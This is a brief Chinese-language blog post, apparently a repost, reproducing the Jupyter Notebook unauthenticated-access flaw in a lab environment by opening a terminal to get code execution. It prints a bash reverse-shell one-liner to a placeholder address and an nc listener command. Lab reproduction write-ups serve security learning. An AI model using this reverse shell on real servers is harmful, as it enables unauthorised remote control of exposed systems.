Jupyter Notebook 未授權訪問漏洞簡單復現

本文轉載自查看原文 2020-04-17 11:04 1680 漏洞復現/ Jupyter Notebook

Jupyter Notebook（此前被稱為 IPython notebook）是一個交互式筆記本，支持運行 40 多種編程語言。
如果管理員未為Jupyter Notebook配置密碼，將導致未授權訪問漏洞，游客可在其中創建一個console並執行任意Python代碼和命令。

來源於https://github.com/vulhub/vulhub/blob/master/jupyter/notebook-rce/
圖方便直接用BUUCTF的REAL環境復現

新建一個terminal窗口，嘿嘿嘿，直接就RCE了

如下圖

關於反彈shell

bash -i >& /dev/tcp/x.x.x.x/8080 0>&1

然后另一邊監聽就好了

nc -lvp 8080（像這樣）

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 漏洞復現 - ZooKeeper未授權訪問漏洞 redis未授權訪問漏洞復現 JBOSS未授權訪問漏洞復現 Redis未授權訪問漏洞復現與利用 ldap未授權訪問漏洞復現 mongodb未授權訪問漏洞復現 rsync未授權訪問漏洞復現寶塔未授權訪問-漏洞復現 Redis未授權訪問漏洞復現 jenkins未授權訪問漏洞復現